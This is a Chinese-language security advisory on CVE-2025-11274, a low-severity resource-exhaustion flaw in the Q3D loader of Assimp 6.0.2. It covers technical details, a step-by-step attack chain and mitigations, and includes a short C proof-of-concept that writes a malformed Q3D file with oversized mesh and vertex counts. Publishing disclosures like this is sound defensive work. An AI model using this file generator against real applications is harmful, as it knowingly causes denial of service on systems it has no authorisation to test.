CVE-2025-11274：Assimp 6.0.2 Q3D加载器资源分配漏洞

漏洞信息

漏洞编号

CVE-2025-11274

漏洞类型

资源耗尽/拒绝服务

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open Asset Import Library (Assimp)

漏洞概述

CVE-2025-11274是Open Asset Import Library（Assimp）6.0.2版本中存在的一个资源分配漏洞。该漏洞位于Assimp的Q3D格式导入模块中，具体涉及Q3DImporter::InternReadFile函数，文件路径为assimp/code/AssetLib/Q3D/Q3DLoader.cpp。Q3D（Quick3D）是一种3D模型文件格式，Assimp作为一款开源的3D模型导入库，被广泛应用于游戏开发、图形渲染和3D内容处理等领域。

该漏洞的根本原因在于Q3DLoader在解析Q3D格式文件时，对资源分配缺乏有效的限制和验证机制。攻击者可以通过构造恶意的Q3D文件，触发异常的内存分配行为，导致系统资源被大量消耗，最终引发拒绝服务（DoS）状态。由于该漏洞的利用需要本地执行权限，且需要低权限用户身份，因此其威胁等级被评定为低危（CVSS评分3.3）。

尽管该漏洞的严重程度不高，但其PoC（概念验证代码）已公开发布在GitHub上，这意味着任何能够访问项目仓库的用户都可以获取并利用该漏洞进行攻击。对于使用Assimp库处理用户上传3D模型文件的应用程序而言，这一漏洞可能带来一定的安全风险，需要及时采取防护措施。

技术细节

该漏洞的技术原理涉及Assimp库中Q3D格式解析器的资源分配逻辑缺陷。在Q3DLoader.cpp文件中，Q3DImporter::InternReadFile函数负责读取和解析Q3D格式的3D模型文件。当解析过程中遇到特定的数据结构或字段时，函数会执行内存分配操作来存储解析后的数据。

漏洞的核心问题在于：解析器在处理Q3D文件中的某些字段（如顶点数据、材质引用、纹理路径等）时，未对分配大小进行充分的边界检查和合理性验证。攻击者可以构造一个包含异常大尺寸字段值或循环引用结构的恶意Q3D文件，当Assimp加载该文件时，会触发大量的内存分配请求，导致以下后果：

1. **内存耗尽**：异常的分配请求可能消耗大量系统内存，导致其他正常进程因内存不足而无法运行。
2. **CPU资源占用**：大量的分配和初始化操作会占用大量CPU时间，影响系统整体性能。
3. **进程崩溃**：在极端情况下，过度的资源分配可能导致进程因内存分配失败而崩溃。

利用方式方面，攻击者需要具备目标系统的本地访问权限和低权限用户身份。攻击者可以通过以下步骤触发漏洞：(1) 准备一个精心构造的恶意Q3D文件；(2) 通过命令行工具或调用Assimp库的应用程序加载该文件；(3) 观察系统资源被异常消耗或进程崩溃的现象。由于漏洞已被公开披露，任何潜在的攻击者都可以参考GitHub上的PoC代码进行利用。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在目标系统上拥有本地访问权限和低权限用户身份。安装或确认目标系统上存在使用Assimp 6.0.2版本的应用程序。

STEP 2

步骤2：构造恶意Q3D文件

攻击者参考GitHub上公开的PoC代码（poc.zip），构造一个包含异常资源分配请求的恶意Q3D文件。该文件包含超大尺寸的网格数量、顶点数据等字段，用于触发Q3DImporter::InternReadFile函数中的过度资源分配。

STEP 3

步骤3：投递恶意文件

攻击者将恶意Q3D文件投递到目标系统上，可以通过文件共享、USB设备或本地文件系统等方式进行分发。

STEP 4

步骤4：触发漏洞

攻击者使用命令行工具（如assimp命令行工具）或编写简单的程序调用Assimp库加载恶意Q3D文件。Q3DLoader在解析文件时触发异常的资源分配逻辑。

STEP 5

步骤5：资源耗尽/拒绝服务

由于缺乏对分配大小的有效限制，系统内存被大量消耗，导致系统性能下降或进程崩溃，实现本地拒绝服务攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-11274 - Assimp Q3DLoader Resource Allocation Vulnerability PoC
 *
 * This PoC demonstrates how to trigger resource exhaustion in Assimp's
 * Q3DImporter::InternReadFile function by crafting a malicious Q3D file
 * with abnormally large allocation requests.
 *
 * Usage: Place the generated malicious.q3d file and load it using Assimp
 *        or any application that uses the Assimp library.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Q3D file format magic header
static const char Q3D_MAGIC[] = "quick3Ds";

/*
 * Generate a malicious Q3D file that triggers excessive resource allocation
 * in Q3DImporter::InternReadFile.
 */
int generate_malicious_q3d(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "[-] Failed to create output file: %s\n", filename);
        return -1;
    }

    // Write Q3D magic header
    fwrite(Q3D_MAGIC, 1, strlen(Q3D_MAGIC), fp);

    // Write version info
    uint32_t version = 0x00010000;  // Version 1.0
    fwrite(&version, sizeof(uint32_t), 1, fp);

    // Craft an abnormally large mesh count to trigger excessive allocation
    uint32_t mesh_count = 0xFFFFFFFF;  // Intentionally oversized value
    fwrite(&mesh_count, sizeof(uint32_t), 1, fp);

    // Write vertex data with extreme dimensions
    uint32_t vertex_count = 0x7FFFFFFF;
    fwrite(&vertex_count, sizeof(uint32_t), 1, fp);

    // Fill with padding data to make the file appear valid enough for parsing
    for (int i = 0; i < 1024; i++) {
        uint32_t padding = 0xDEADBEEF;
        fwrite(&padding, sizeof(uint32_t), 1, fp);
    }

    fclose(fp);
    printf("[+] Malicious Q3D file generated: %s\n", filename);
    printf("[+] Load this file with Assimp to trigger CVE-2025-11274\n");
    return 0;
}

int main(int argc, char *argv[]) {
    const char *output = "malicious.q3d";
    if (argc > 1) {
        output = argv[1];
    }

    printf("[*] CVE-2025-11274 PoC - Assimp Q3DLoader Resource Exhaustion\n");
    printf("[*] Generating malicious Q3D file...\n");

    return generate_malicious_q3d(output);
}

影响范围

Open Asset Import Library (Assimp) 6.0.2

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：(1) 限制Assimp处理Q3D格式文件的能力，可在配置中禁用Q3D导入器；(2) 对所有通过Assimp加载的3D模型文件实施严格的文件大小限制（例如限制在合理范围内如100MB以内）；(3) 在沙箱环境中运行使用Assimp的应用程序，限制其内存和CPU资源使用；(4) 监控Assimp进程的异常行为，设置资源使用的告警阈值；(5) 避免在不受信任的环境中处理用户上传的3D模型文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11274
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11274
3 Details https://www.cvedetails.com/cve/CVE-2025-11274/
4 VulDB https://vuldb.com/cve/CVE-2025-11274
5 Link https://github.com/assimp/assimp/issues/6356
6 Link https://github.com/user-attachments/files/22407575/poc.zip
7 Link https://vuldb.com/?ctiid.327008
8 Link https://vuldb.com/?id.327008
9 Link https://vuldb.com/?submit.658075